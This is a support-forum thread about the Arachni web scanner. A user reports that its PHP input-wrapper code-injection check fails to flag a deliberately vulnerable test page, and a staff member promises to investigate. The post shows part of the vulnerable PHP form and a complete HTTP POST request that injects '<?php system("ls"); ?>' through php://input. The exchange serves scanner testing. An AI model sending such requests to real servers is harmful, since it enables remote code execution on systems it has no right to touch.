[Check] code injection php input wrapper does not work properly ?

Malween Le Goffic's Avatar

Malween Le Goffic

22 Nov, 2017 10:00 PM

Hello Tasos,

I try do raise the "code injection php input wrapper" check but Arachni scan do not raise anything.

Here the sample code (PHP) :

    <title>Code injection (php input wrapper)</title>
    <h1>Code injection (php input wrapper)</h1>
    <form action="" method="get">
        <label for="untrusted_input">Input :</label>
        <input type="text" id="untrusted_input" name="untrusted_input"/>
        <input type="submit" value="Submit"/>
      if(isset($_GET['untrusted_input'])) {

The vulnerability can be expoited with few modification (modifications are GET -> POST, get untrusted param -> php wrapper and add a POST payload) :

POST /code_injection/code_injection_php_input_wrapper.php?untrusted_input=php://input HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

untrusted_input=<?php system("ls"); ?>

I looked in code_injection_php_input_wrapper.rb source code and I noticed the specific payload "vDBVBsbVdv PLL!8o7". But when I analyse my Apache log files none such data are post. (only php://inpu are tested without payload).

Do you have any idea why Arachni does not raise an alert ?

Best regards,

  1. Support Staff 1 Posted by Tasos Laskos on 19 Dec, 2017 04:33 PM

    Tasos Laskos's Avatar


    Sorry, I don't, I'll run some tests and get back to you.


    PS. Sorry for the excessively late reply, I've been working on something.

Reply to this discussion

Internal reply

Formatting help / Preview (switch to plain text) No formatting (switch to Markdown)

Attaching KB article:


Attached Files

You can attach files up to 10MB

If you don't have an account yet, we need to confirm you're human and not a machine trying to post spam.

Keyboard shortcuts


? Show this help
ESC Blurs the current field

Comment Form

r Focus the comment reply box
^ + ↩ Submit the comment

You can use Command ⌘ instead of Control ^ on Mac